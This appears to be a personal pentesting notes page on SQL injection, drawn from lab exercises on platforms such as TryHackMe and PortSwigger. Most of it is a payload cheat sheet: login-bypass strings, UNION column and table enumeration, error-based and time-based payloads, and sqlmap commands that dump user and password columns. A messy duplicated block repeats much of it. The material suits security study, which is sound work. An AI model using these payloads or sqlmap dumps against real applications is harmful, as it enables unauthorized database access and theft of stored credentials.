sqli

SQL injection is a security vulnerability that allows an attacker to interfere with the queries sent to a database. An attacker can exploit a poorly designed application and pass malicious SQL

Save the POST or GET request and execute with Sqlmap to search for SQL Injection

THM login as bender bender@juice-sh.op' --

sqli start with ' ' or 1=1; -- - UNION Based injection fast than boolean based ones: 'UNION SELECT 'test1','test2'; -- - until you have the correct number of columns

SQLMap sqlmap -u 'http://testsite.example/search.php?search=n' -p search

UNION based: sqlmap -u 'http://testsite.example/search.php?search=n' -p search --technique=U

saved request from Burp sqlmap -r /root/blog.req -p user --technique=B --banner

Payloads used : sqlmap -u 'http://testsite.example/search.php?search=n' -p search --technique=U -v3 --fresh-queries

Dump: sqlmap -u 'http://testsite.example/search.php?search=n' -p search --technique=U -D blogdb -T users -C users,password --dump

Boolean based on Login form sqlmap -u 'http://test.example/login.php' --data="user=a&password=a' -p user --technique=B --banner

Error based injections 1'

reverse engineer the query reading the error printed by the app 1');--

remove the ' 1);--

trigger arbitary data to return errors triggering a data type

1 or @@version=1);-- 1 or db_name(1)=1);-- 1 or db_name(2)=1);--

wget "examplesite.com/products.php?id=1 or 1 IN (SELECT TOP 1 CAST(@@version as varchar(4096))))--" -q -O -

In-Band SQL Injections id=200' and 'a'='a

id=200' UNION SELECT null,null, null; -- -

Microsoft SQL https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'

SQLi : String Concatenation -1 UNION SELECT username,passwd FROM users_private where username=concat(char(39),char(74),char(97),char(110),char(101),char(39)) 

// retrieve passwd  74 65 77 69 83 using asciitable.com & Union select with concatenation
-1 UNION SELECT username,passwd FROM users_private where username=concat(char(74),char(65),char(77),char(69),char(83))

CONCAT joins strings or characters and CHAR enables you to get an ASCII representation from a decimal code. Look at the ASCII table here:

https://www.asciitable.com/ The CHAR() function returns the character based on the ASCII code.

https://www.w3schools.com/sql/trysqlserver.asp?filename=trysql_func_sqlserver_char Get DB Version and DB Tables' UNION SELECT @@version,null,null#

10.5.9-MariaDB

' UNION SELECT TABLE_NAME,null,null FROM information_schema.tables#

SELECT * FROM information_schema.columns WHERE table_name='accounts'

SELECT * FROM information_schema.tables TABLE_SCHEMA, TABLE_NAME, TABLE_TYPE.

contains an SQL injection vuln in the product category filter. When the user selects a category, the application carries out an SQL query like the following:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1 filter?category='+OR+1=1--

// random code - clean up
sqli
start with
'
' or 1=1; -- -

'UNION SELECT 'test1','test2'; -- -
until you have the correct number of columns

sqlmap -u 'http://testsite.example/search.php?search=n' -p search

UNION based:
sqlmap -u 'http://testsite.example/search.php?search=n' -p search --technique=U

Payloads used
sqlmap -u 'http://testsite.example/search.php?search=n' -p search --technique=U -v3 --fresh-queries

sqlmap -u 'http://testsite.example/search.php?search=n' -p search --technique=U -D blogdb -T users -C users,password --dump

sqlmap -u 'http://test.example/login.php' --data="user=a&password=a' -p user --technique=B --banner

saved request from Burp
sqlmap -r /root/blog.req -p user --technique=B --banner

Error based injections
1'

reverse engineer the query
reading the error printed by the app
1');--

remove the '
1);--

trigger arbitary data to return errors
triggering a data type 

1 or @@version=1);--
1 or db_name(1)=1);--
1 or db_name(2)=1);--

wget "examplesite.com/products.php?id=1 or 1 IN (SELECT TOP 1 CAST(@@version as varchar(4096))))--" -q -O -


In-Band SQL Injections
id=200' and 'a'='a

id=200' UNION SELECT null,null, null; -- -


pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet


-A "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/103.0"


wiener@exploit-0a2500eb03d06c6ac04c14a901c10018.web-security-academy.net


https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(2),2 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name like 'anak%

SQL Workbench

' or username='rickie' --

SQL injection is a security vulnerability that allows an attacker to interfere with the queries sent to a database. An attacker can exploit a poorly designed application and pass malicious SQL statements to the application's backend database. This typically gives the attacker access to data they otherwise wouldn't be able to retrieve, which could be all other database records accessible by the application.

  • ' or username='admin' -- – This payload works in the same way as the previous one, however the condition is replaced in order to log in as a specific user. This would cause our login SQL to become:

SELECT * FROM users WHERE username='' or username='admin' --' and password='testing123'
PreviousCSRFNextPhp

Last updated

Was this helpful?